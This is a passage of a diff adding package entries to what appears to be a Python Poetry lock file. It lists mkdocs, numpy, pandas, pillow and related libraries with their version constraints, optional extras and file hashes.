+version = "1.3.4"
+description = "A deep merge function for 🐍."
+optional = false
+python-versions = ">=3.6"
+files = [
+ {file = "mergedeep-1.3.4-py3-none-any.whl", hash = "sha256:70775750742b25c0d8f36c55aed03d24c3384d17c951b3175d898bd778ef0307"},
+ {file = "mergedeep-1.3.4.tar.gz", hash = "sha256:0096d52e9dad9939c3d975a774666af186eda617e6ca84df4c94dec30004f2a8"},
+]
+
+[[package]]
+name = "mkdocs"
+version = "1.5.3"
+description = "Project documentation with Markdown."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "mkdocs-1.5.3-py3-none-any.whl", hash = "sha256:3b3a78e736b31158d64dbb2f8ba29bd46a379d0c6e324c2246c3bc3d2189cfc1"},
+ {file = "mkdocs-1.5.3.tar.gz", hash = "sha256:eb7c99214dcb945313ba30426c2451b735992c73c2e10838f76d09e39ff4d0e2"},
+]
+
+[package.dependencies]
+click = ">=7.0"
+colorama = {version = ">=0.4", markers = "platform_system == \"Windows\""}
+ghp-import = ">=1.0"
+importlib-metadata = {version = ">=4.3", markers = "python_version < \"3.10\""}
+jinja2 = ">=2.11.1"
+markdown = ">=3.2.1"
+markupsafe = ">=2.0.1"
+mergedeep = ">=1.3.4"
+packaging = ">=20.5"
+pathspec = ">=0.11.1"
+platformdirs = ">=2.2.0"
+pyyaml = ">=5.1"
+pyyaml-env-tag = ">=0.1"
+watchdog = ">=2.0"
+
+[package.extras]
+i18n = ["babel (>=2.9.0)"]
+min-versions = ["babel (==2.9.0)", "click (==7.0)", "colorama (==0.4)", "ghp-import (==1.0)", "importlib-metadata (==4.3)", "jinja2 (==2.11.1)", "markdown (==3.2.1)", "markupsafe (==2.0.1)", "mergedeep (==1.3.4)", "packaging (==20.5)", "pathspec (==0.11.1)", "platformdirs (==2.2.0)", "pyyaml (==5.1)", "pyyaml-env-tag (==0.1)", "typing-extensions (==3.10)", "watchdog (==2.0)"]
+
+[[package]]
+name = "mkdocs-autorefs"
+version = "1.2.0"
+description = "Automatically link across pages in MkDocs."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "mkdocs_autorefs-1.2.0-py3-none-any.whl", hash = "sha256:d588754ae89bd0ced0c70c06f58566a4ee43471eeeee5202427da7de9ef85a2f"},
+ {file = "mkdocs_autorefs-1.2.0.tar.gz", hash = "sha256:a86b93abff653521bda71cf3fc5596342b7a23982093915cb74273f67522190f"},
+]
+
+[package.dependencies]
+Markdown = ">=3.3"
+markupsafe = ">=2.0.1"
+mkdocs = ">=1.1"
+
+[[package]]
+name = "mkdocstrings"
+version = "0.26.1"
+description = "Automatic documentation from sources, for MkDocs."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "mkdocstrings-0.26.1-py3-none-any.whl", hash = "sha256:29738bfb72b4608e8e55cc50fb8a54f325dc7ebd2014e4e3881a49892d5983cf"},
+ {file = "mkdocstrings-0.26.1.tar.gz", hash = "sha256:bb8b8854d6713d5348ad05b069a09f3b79edbc6a0f33a34c6821141adb03fe33"},
+]
+
+[package.dependencies]
+click = ">=7.0"
+importlib-metadata = {version = ">=4.6", markers = "python_version < \"3.10\""}
+Jinja2 = ">=2.11.1"
+Markdown = ">=3.6"
+MarkupSafe = ">=1.1"
+mkdocs = ">=1.4"
+mkdocs-autorefs = ">=1.2"
+platformdirs = ">=2.2"
+pymdown-extensions = ">=6.3"
+typing-extensions = {version = ">=4.1", markers = "python_version < \"3.10\""}
+
+[package.extras]
+crystal = ["mkdocstrings-crystal (>=0.3.4)"]
+python = ["mkdocstrings-python (>=0.5.2)"]
+python-legacy = ["mkdocstrings-python-legacy (>=0.2.1)"]
+
+[[package]]
+name = "mkdocstrings-python"
+version = "1.7.2"
+description = "A Python handler for mkdocstrings."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "mkdocstrings_python-1.7.2-py3-none-any.whl", hash = "sha256:2d005729a90f1b86d6d71fad4953d787140996adec5b00a25fafc6ee48e1b79a"},
+ {file = "mkdocstrings_python-1.7.2.tar.gz", hash = "sha256:75b6af86f9dcdc2d864072d8fed5b1d45ad94dd2ce97843ef52ca87ad53d9b26"},
+]
+
+[package.dependencies]
+griffe = ">=0.35"
+mkdocstrings = ">=0.20"
+
+[[package]]
+name = "nodeenv"
+version = "1.9.1"
+description = "Node.js virtual environment builder"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7"
+files = [
+ {file = "nodeenv-1.9.1-py2.py3-none-any.whl", hash = "sha256:ba11c9782d29c27c70ffbdda2d7415098754709be8a7056d79a737cd901155c9"},
+ {file = "nodeenv-1.9.1.tar.gz", hash = "sha256:6ec12890a2dab7946721edbfbcd91f3319c6ccc9aec47be7c7e6b7011ee6645f"},
+]
+
+[[package]]
+name = "numpy"
+version = "1.24.4"
+description = "Fundamental package for array computing in Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "numpy-1.24.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c0bfb52d2169d58c1cdb8cc1f16989101639b34c7d3ce60ed70b19c63eba0b64"},
+ {file = "numpy-1.24.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ed094d4f0c177b1b8e7aa9cba7d6ceed51c0e569a5318ac0ca9a090680a6a1b1"},
+ {file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79fc682a374c4a8ed08b331bef9c5f582585d1048fa6d80bc6c35bc384eee9b4"},
+ {file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7ffe43c74893dbf38c2b0a1f5428760a1a9c98285553c89e12d70a96a7f3a4d6"},
+ {file = "numpy-1.24.4-cp310-cp310-win32.whl", hash = "sha256:4c21decb6ea94057331e111a5bed9a79d335658c27ce2adb580fb4d54f2ad9bc"},
+ {file = "numpy-1.24.4-cp310-cp310-win_amd64.whl", hash = "sha256:b4bea75e47d9586d31e892a7401f76e909712a0fd510f58f5337bea9572c571e"},
+ {file = "numpy-1.24.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:f136bab9c2cfd8da131132c2cf6cc27331dd6fae65f95f69dcd4ae3c3639c810"},
+ {file = "numpy-1.24.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e2926dac25b313635e4d6cf4dc4e51c8c0ebfed60b801c799ffc4c32bf3d1254"},
+ {file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:222e40d0e2548690405b0b3c7b21d1169117391c2e82c378467ef9ab4c8f0da7"},
+ {file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7215847ce88a85ce39baf9e89070cb860c98fdddacbaa6c0da3ffb31b3350bd5"},
+ {file = "numpy-1.24.4-cp311-cp311-win32.whl", hash = "sha256:4979217d7de511a8d57f4b4b5b2b965f707768440c17cb70fbf254c4b225238d"},
+ {file = "numpy-1.24.4-cp311-cp311-win_amd64.whl", hash = "sha256:b7b1fc9864d7d39e28f41d089bfd6353cb5f27ecd9905348c24187a768c79694"},
+ {file = "numpy-1.24.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1452241c290f3e2a312c137a9999cdbf63f78864d63c79039bda65ee86943f61"},
+ {file = "numpy-1.24.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:04640dab83f7c6c85abf9cd729c5b65f1ebd0ccf9de90b270cd61935eef0197f"},
+ {file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5425b114831d1e77e4b5d812b69d11d962e104095a5b9c3b641a218abcc050e"},
+ {file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd80e219fd4c71fc3699fc1dadac5dcf4fd882bfc6f7ec53d30fa197b8ee22dc"},
+ {file = "numpy-1.24.4-cp38-cp38-win32.whl", hash = "sha256:4602244f345453db537be5314d3983dbf5834a9701b7723ec28923e2889e0bb2"},
+ {file = "numpy-1.24.4-cp38-cp38-win_amd64.whl", hash = "sha256:692f2e0f55794943c5bfff12b3f56f99af76f902fc47487bdfe97856de51a706"},
+ {file = "numpy-1.24.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2541312fbf09977f3b3ad449c4e5f4bb55d0dbf79226d7724211acc905049400"},
+ {file = "numpy-1.24.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9667575fb6d13c95f1b36aca12c5ee3356bf001b714fc354eb5465ce1609e62f"},
+ {file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f3a86ed21e4f87050382c7bc96571755193c4c1392490744ac73d660e8f564a9"},
+ {file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d11efb4dbecbdf22508d55e48d9c8384db795e1b7b51ea735289ff96613ff74d"},
+ {file = "numpy-1.24.4-cp39-cp39-win32.whl", hash = "sha256:6620c0acd41dbcb368610bb2f4d83145674040025e5536954782467100aa8835"},
+ {file = "numpy-1.24.4-cp39-cp39-win_amd64.whl", hash = "sha256:befe2bf740fd8373cf56149a5c23a0f601e82869598d41f8e188a0e9869926f8"},
+ {file = "numpy-1.24.4-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:31f13e25b4e304632a4619d0e0777662c2ffea99fcae2029556b17d8ff958aef"},
+ {file = "numpy-1.24.4-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:95f7ac6540e95bc440ad77f56e520da5bf877f87dca58bd095288dce8940532a"},
+ {file = "numpy-1.24.4-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:e98f220aa76ca2a977fe435f5b04d7b3470c0a2e6312907b37ba6068f26787f2"},
+ {file = "numpy-1.24.4.tar.gz", hash = "sha256:80f5e3a4e498641401868df4208b74581206afbee7cf7b8329daae82676d9463"},
+]
+
+[[package]]
+name = "openpyxl"
+version = "3.1.5"
+description = "A Python library to read/write Excel 2010 xlsx/xlsm files"
+optional = true
+python-versions = ">=3.8"
+files = [
+ {file = "openpyxl-3.1.5-py2.py3-none-any.whl", hash = "sha256:5282c12b107bffeef825f4617dc029afaf41d0ea60823bbb665ef3079dc79de2"},
+ {file = "openpyxl-3.1.5.tar.gz", hash = "sha256:cf0e3cf56142039133628b5acffe8ef0c12bc902d2aadd3e0fe5878dc08d1050"},
+]
+
+[package.dependencies]
+et-xmlfile = "*"
+
+[[package]]
+name = "packaging"
+version = "24.2"
+description = "Core utilities for Python packages"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "packaging-24.2-py3-none-any.whl", hash = "sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759"},
+ {file = "packaging-24.2.tar.gz", hash = "sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f"},
+]
+
+[[package]]
+name = "pandas"
+version = "2.0.3"
+description = "Powerful data structures for data analysis, time series, and statistics"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pandas-2.0.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e4c7c9f27a4185304c7caf96dc7d91bc60bc162221152de697c98eb0b2648dd8"},
+ {file = "pandas-2.0.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:f167beed68918d62bffb6ec64f2e1d8a7d297a038f86d4aed056b9493fca407f"},
+ {file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ce0c6f76a0f1ba361551f3e6dceaff06bde7514a374aa43e33b588ec10420183"},
+ {file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba619e410a21d8c387a1ea6e8a0e49bb42216474436245718d7f2e88a2f8d7c0"},
+ {file = "pandas-2.0.3-cp310-cp310-win32.whl", hash = "sha256:3ef285093b4fe5058eefd756100a367f27029913760773c8bf1d2d8bebe5d210"},
+ {file = "pandas-2.0.3-cp310-cp310-win_amd64.whl", hash = "sha256:9ee1a69328d5c36c98d8e74db06f4ad518a1840e8ccb94a4ba86920986bb617e"},
+ {file = "pandas-2.0.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b084b91d8d66ab19f5bb3256cbd5ea661848338301940e17f4492b2ce0801fe8"},
+ {file = "pandas-2.0.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:37673e3bdf1551b95bf5d4ce372b37770f9529743d2498032439371fc7b7eb26"},
+ {file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b9cb1e14fdb546396b7e1b923ffaeeac24e4cedd14266c3497216dd4448e4f2d"},
+ {file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d9cd88488cceb7635aebb84809d087468eb33551097d600c6dad13602029c2df"},
+ {file = "pandas-2.0.3-cp311-cp311-win32.whl", hash = "sha256:694888a81198786f0e164ee3a581df7d505024fbb1f15202fc7db88a71d84ebd"},
+ {file = "pandas-2.0.3-cp311-cp311-win_amd64.whl", hash = "sha256:6a21ab5c89dcbd57f78d0ae16630b090eec626360085a4148693def5452d8a6b"},
+ {file = "pandas-2.0.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9e4da0d45e7f34c069fe4d522359df7d23badf83abc1d1cef398895822d11061"},
+ {file = "pandas-2.0.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:32fca2ee1b0d93dd71d979726b12b61faa06aeb93cf77468776287f41ff8fdc5"},
+ {file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:258d3624b3ae734490e4d63c430256e716f488c4fcb7c8e9bde2d3aa46c29089"},
+ {file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9eae3dc34fa1aa7772dd3fc60270d13ced7346fcbcfee017d3132ec625e23bb0"},
+ {file = "pandas-2.0.3-cp38-cp38-win32.whl", hash = "sha256:f3421a7afb1a43f7e38e82e844e2bca9a6d793d66c1a7f9f0ff39a795bbc5e02"},
+ {file = "pandas-2.0.3-cp38-cp38-win_amd64.whl", hash = "sha256:69d7f3884c95da3a31ef82b7618af5710dba95bb885ffab339aad925c3e8ce78"},
+ {file = "pandas-2.0.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5247fb1ba347c1261cbbf0fcfba4a3121fbb4029d95d9ef4dc45406620b25c8b"},
+ {file = "pandas-2.0.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:81af086f4543c9d8bb128328b5d32e9986e0c84d3ee673a2ac6fb57fd14f755e"},
+ {file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1994c789bf12a7c5098277fb43836ce090f1073858c10f9220998ac74f37c69b"},
+ {file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5ec591c48e29226bcbb316e0c1e9423622bc7a4eaf1ef7c3c9fa1a3981f89641"},
+ {file = "pandas-2.0.3-cp39-cp39-win32.whl", hash = "sha256:04dbdbaf2e4d46ca8da896e1805bc04eb85caa9a82e259e8eed00254d5e0c682"},
+ {file = "pandas-2.0.3-cp39-cp39-win_amd64.whl", hash = "sha256:1168574b036cd8b93abc746171c9b4f1b83467438a5e45909fed645cf8692dbc"},
+ {file = "pandas-2.0.3.tar.gz", hash = "sha256:c02f372a88e0d17f36d3093a644c73cfc1788e876a7c4bcb4020a77512e2043c"},
+]
+
+[package.dependencies]
+numpy = [
+ {version = ">=1.20.3", markers = "python_version < \"3.10\""},
+ {version = ">=1.21.0", markers = "python_version >= \"3.10\" and python_version < \"3.11\""},
+ {version = ">=1.23.2", markers = "python_version >= \"3.11\""},
+]
+python-dateutil = ">=2.8.2"
+pytz = ">=2020.1"
+tzdata = ">=2022.1"
+
+[package.extras]
+all = ["PyQt5 (>=5.15.1)", "SQLAlchemy (>=1.4.16)", "beautifulsoup4 (>=4.9.3)", "bottleneck (>=1.3.2)", "brotlipy (>=0.7.0)", "fastparquet (>=0.6.3)", "fsspec (>=2021.07.0)", "gcsfs (>=2021.07.0)", "html5lib (>=1.1)", "hypothesis (>=6.34.2)", "jinja2 (>=3.0.0)", "lxml (>=4.6.3)", "matplotlib (>=3.6.1)", "numba (>=0.53.1)", "numexpr (>=2.7.3)", "odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pandas-gbq (>=0.15.0)", "psycopg2 (>=2.8.6)", "pyarrow (>=7.0.0)", "pymysql (>=1.0.2)", "pyreadstat (>=1.1.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)", "python-snappy (>=0.6.0)", "pyxlsb (>=1.0.8)", "qtpy (>=2.2.0)", "s3fs (>=2021.08.0)", "scipy (>=1.7.1)", "tables (>=3.6.1)", "tabulate (>=0.8.9)", "xarray (>=0.21.0)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)", "zstandard (>=0.15.2)"]
+aws = ["s3fs (>=2021.08.0)"]
+clipboard = ["PyQt5 (>=5.15.1)", "qtpy (>=2.2.0)"]
+compression = ["brotlipy (>=0.7.0)", "python-snappy (>=0.6.0)", "zstandard (>=0.15.2)"]
+computation = ["scipy (>=1.7.1)", "xarray (>=0.21.0)"]
+excel = ["odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pyxlsb (>=1.0.8)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)"]
+feather = ["pyarrow (>=7.0.0)"]
+fss = ["fsspec (>=2021.07.0)"]
+gcp = ["gcsfs (>=2021.07.0)", "pandas-gbq (>=0.15.0)"]
+hdf5 = ["tables (>=3.6.1)"]
+html = ["beautifulsoup4 (>=4.9.3)", "html5lib (>=1.1)", "lxml (>=4.6.3)"]
+mysql = ["SQLAlchemy (>=1.4.16)", "pymysql (>=1.0.2)"]
+output-formatting = ["jinja2 (>=3.0.0)", "tabulate (>=0.8.9)"]
+parquet = ["pyarrow (>=7.0.0)"]
+performance = ["bottleneck (>=1.3.2)", "numba (>=0.53.1)", "numexpr (>=2.7.1)"]
+plot = ["matplotlib (>=3.6.1)"]
+postgresql = ["SQLAlchemy (>=1.4.16)", "psycopg2 (>=2.8.6)"]
+spss = ["pyreadstat (>=1.1.2)"]
+sql-other = ["SQLAlchemy (>=1.4.16)"]
+test = ["hypothesis (>=6.34.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)"]
+xml = ["lxml (>=4.6.3)"]
+
+[[package]]
+name = "pathspec"
+version = "0.12.1"
+description = "Utility library for gitignore style pattern matching of file paths."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pathspec-0.12.1-py3-none-any.whl", hash = "sha256:a0d503e138a4c123b27490a4f7beda6a01c6f288df0e4a8b79c7eb0dc7b4cc08"},
+ {file = "pathspec-0.12.1.tar.gz", hash = "sha256:a482d51503a1ab33b1c67a6c3813a26953dbdc71c31dacaef9a838c4e29f5712"},
+]
+
+[[package]]
+name = "pillow"
+version = "10.4.0"
+description = "Python Imaging Library (Fork)"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pillow-10.4.0-cp310-cp310-macosx_10_10_x86_64.whl", hash = "sha256:4d9667937cfa347525b319ae34375c37b9ee6b525440f3ef48542fcf66f2731e"},
+ {file = "pillow-10.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:543f3dc61c18dafb755773efc89aae60d06b6596a63914107f75459cf984164d"},
+ {file = "pillow-10.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7928ecbf1ece13956b95d9cbcfc77137652b02763ba384d9ab508099a2eca856"},
+ {file = "pillow-10.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e4d49b85c4348ea0b31ea63bc75a9f3857869174e2bf17e7aba02945cd218e6f"},
+ {file = "pillow-10.4.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:6c762a5b0997f5659a5ef2266abc1d8851ad7749ad9a6a5506eb23d314e4f46b"},
+ {file = "pillow-10.4.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:a985e028fc183bf12a77a8bbf36318db4238a3ded7fa9df1b9a133f1cb79f8fc"},
+ {file = "pillow-10.4.0-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:812f7342b0eee081eaec84d91423d1b4650bb9828eb53d8511bcef8ce5aecf1e"},
+ {file = "pillow-10.4.0-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:ac1452d2fbe4978c2eec89fb5a23b8387aba707ac72810d9490118817d9c0b46"},
+ {file = "pillow-10.4.0-cp310-cp310-win32.whl", hash = "sha256:bcd5e41a859bf2e84fdc42f4edb7d9aba0a13d29a2abadccafad99de3feff984"},
+ {file = "pillow-10.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:ecd85a8d3e79cd7158dec1c9e5808e821feea088e2f69a974db5edf84dc53141"},
+ {file = "pillow-10.4.0-cp310-cp310-win_arm64.whl", hash = "sha256:ff337c552345e95702c5fde3158acb0625111017d0e5f24bf3acdb9cc16b90d1"},
+ {file = "pillow-10.4.0-cp311-cp311-macosx_10_10_x86_64.whl", hash = "sha256:0a9ec697746f268507404647e531e92889890a087e03681a3606d9b920fbee3c"},
+ {file = "pillow-10.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:dfe91cb65544a1321e631e696759491ae04a2ea11d36715eca01ce07284738be"},
+ {file = "pillow-10.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5dc6761a6efc781e6a1544206f22c80c3af4c8cf461206d46a1e6006e4429ff3"},
+ {file = "pillow-10.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5e84b6cc6a4a3d76c153a6b19270b3526a5a8ed6b09501d3af891daa2a9de7d6"},
+ {file = "pillow-10.4.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:bbc527b519bd3aa9d7f429d152fea69f9ad37c95f0b02aebddff592688998abe"},
+ {file = "pillow-10.4.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:76a911dfe51a36041f2e756b00f96ed84677cdeb75d25c767f296c1c1eda1319"},
+ {file = "pillow-10.4.0-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:59291fb29317122398786c2d44427bbd1a6d7ff54017075b22be9d21aa59bd8d"},
+ {file = "pillow-10.4.0-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:416d3a5d0e8cfe4f27f574362435bc9bae57f679a7158e0096ad2beb427b8696"},
+ {file = "pillow-10.4.0-cp311-cp311-win32.whl", hash = "sha256:7086cc1d5eebb91ad24ded9f58bec6c688e9f0ed7eb3dbbf1e4800280a896496"},
+ {file = "pillow-10.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:cbed61494057c0f83b83eb3a310f0bf774b09513307c434d4366ed64f4128a91"},
+ {file = "pillow-10.4.0-cp311-cp311-win_arm64.whl", hash = "sha256:f5f0c3e969c8f12dd2bb7e0b15d5c468b51e5017e01e2e867335c81903046a22"},
+ {file = "pillow-10.4.0-cp312-cp312-macosx_10_10_x86_64.whl", hash = "sha256:673655af3eadf4df6b5457033f086e90299fdd7a47983a13827acf7459c15d94"},
+ {file = "pillow-10.4.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:866b6942a92f56300012f5fbac71f2d610312ee65e22f1aa2609e491284e5597"},
+ {file = "pillow-10.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:29dbdc4207642ea6aad70fbde1a9338753d33fb23ed6956e706936706f52dd80"},
+ {file = "pillow-10.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bf2342ac639c4cf38799a44950bbc2dfcb685f052b9e262f446482afaf4bffca"},
+ {file = "pillow-10.4.0-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:f5b92f4d70791b4a67157321c4e8225d60b119c5cc9aee8ecf153aace4aad4ef"},
+ {file = "pillow-10.4.0-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:86dcb5a1eb778d8b25659d5e4341269e8590ad6b4e8b44d9f4b07f8d136c414a"},
+ {file = "pillow-10.4.0-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:780c072c2e11c9b2c7ca37f9a2ee8ba66f44367ac3e5c7832afcfe5104fd6d1b"},
+ {file = "pillow-10.4.0-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:37fb69d905be665f68f28a8bba3c6d3223c8efe1edf14cc4cfa06c241f8c81d9"},
+ {file = "pillow-10.4.0-cp312-cp312-win32.whl", hash = "sha256:7dfecdbad5c301d7b5bde160150b4db4c659cee2b69589705b6f8a0c509d9f42"},
+ {file = "pillow-10.4.0-cp312-cp312-win_amd64.whl", hash = "sha256:1d846aea995ad352d4bdcc847535bd56e0fd88d36829d2c90be880ef1ee4668a"},
+ {file = "pillow-10.4.0-cp312-cp312-win_arm64.whl", hash = "sha256:e553cad5179a66ba15bb18b353a19020e73a7921296a7979c4a2b7f6a5cd57f9"},
+ {file = "pillow-10.4.0-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:8bc1a764ed8c957a2e9cacf97c8b2b053b70307cf2996aafd70e91a082e70df3"},
+ {file = "pillow-10.4.0-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:6209bb41dc692ddfee4942517c19ee81b86c864b626dbfca272ec0f7cff5d9fb"},
+ {file = "pillow-10.4.0-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bee197b30783295d2eb680b311af15a20a8b24024a19c3a26431ff83eb8d1f70"},
+ {file = "pillow-10.4.0-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1ef61f5dd14c300786318482456481463b9d6b91ebe5ef12f405afbba77ed0be"},
+ {file = "pillow-10.4.0-cp313-cp313-manylinux_2_28_aarch64.whl", hash = "sha256:297e388da6e248c98bc4a02e018966af0c5f92dfacf5a5ca22fa01cb3179bca0"},
+ {file = "pillow-10.4.0-cp313-cp313-manylinux_2_28_x86_64.whl", hash = "sha256:e4db64794ccdf6cb83a59d73405f63adbe2a1887012e308828596100a0b2f6cc"},
+ {file = "pillow-10.4.0-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:bd2880a07482090a3bcb01f4265f1936a903d70bc740bfcb1fd4e8a2ffe5cf5a"},
+ {file = "pillow-10.4.0-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4b35b21b819ac1dbd1233317adeecd63495f6babf21b7b2512d244ff6c6ce309"},
+ {file = "pillow-10.4.0-cp313-cp313-win32.whl", hash = "sha256:551d3fd6e9dc15e4c1eb6fc4ba2b39c0c7933fa113b220057a34f4bb3268a060"},
+ {file = "pillow-10.4.0-cp313-cp313-win_amd64.whl", hash = "sha256:030abdbe43ee02e0de642aee345efa443740aa4d828bfe8e2eb11922ea6a21ea"},
+ {file = "pillow-10.4.0-cp313-cp313-win_arm64.whl", hash = "sha256:5b001114dd152cfd6b23befeb28d7aee43553e2402c9f159807bf55f33af8a8d"},
+ {file = "pillow-10.4.0-cp38-cp38-macosx_10_10_x86_64.whl", hash = "sha256:8d4d5063501b6dd4024b8ac2f04962d661222d120381272deea52e3fc52d3736"},
+ {file = "pillow-10.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7c1ee6f42250df403c5f103cbd2768a28fe1a0ea1f0f03fe151c8741e1469c8b"},
+ {file = "pillow-10.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b15e02e9bb4c21e39876698abf233c8c579127986f8207200bc8a8f6bb27acf2"},
+ {file = "pillow-10.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7a8d4bade9952ea9a77d0c3e49cbd8b2890a399422258a77f357b9cc9be8d680"},
+ {file = "pillow-10.4.0-cp38-cp38-manylinux_2_28_aarch64.whl", hash = "sha256:43efea75eb06b95d1631cb784aa40156177bf9dd5b4b03ff38979e048258bc6b"},
+ {file = "pillow-10.4.0-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:950be4d8ba92aca4b2bb0741285a46bfae3ca699ef913ec8416c1b78eadd64cd"},
+ {file = "pillow-10.4.0-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:d7480af14364494365e89d6fddc510a13e5a2c3584cb19ef65415ca57252fb84"},
+ {file = "pillow-10.4.0-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:73664fe514b34c8f02452ffb73b7a92c6774e39a647087f83d67f010eb9a0cf0"},
+ {file = "pillow-10.4.0-cp38-cp38-win32.whl", hash = "sha256:e88d5e6ad0d026fba7bdab8c3f225a69f063f116462c49892b0149e21b6c0a0e"},
+ {file = "pillow-10.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:5161eef006d335e46895297f642341111945e2c1c899eb406882a6c61a4357ab"},
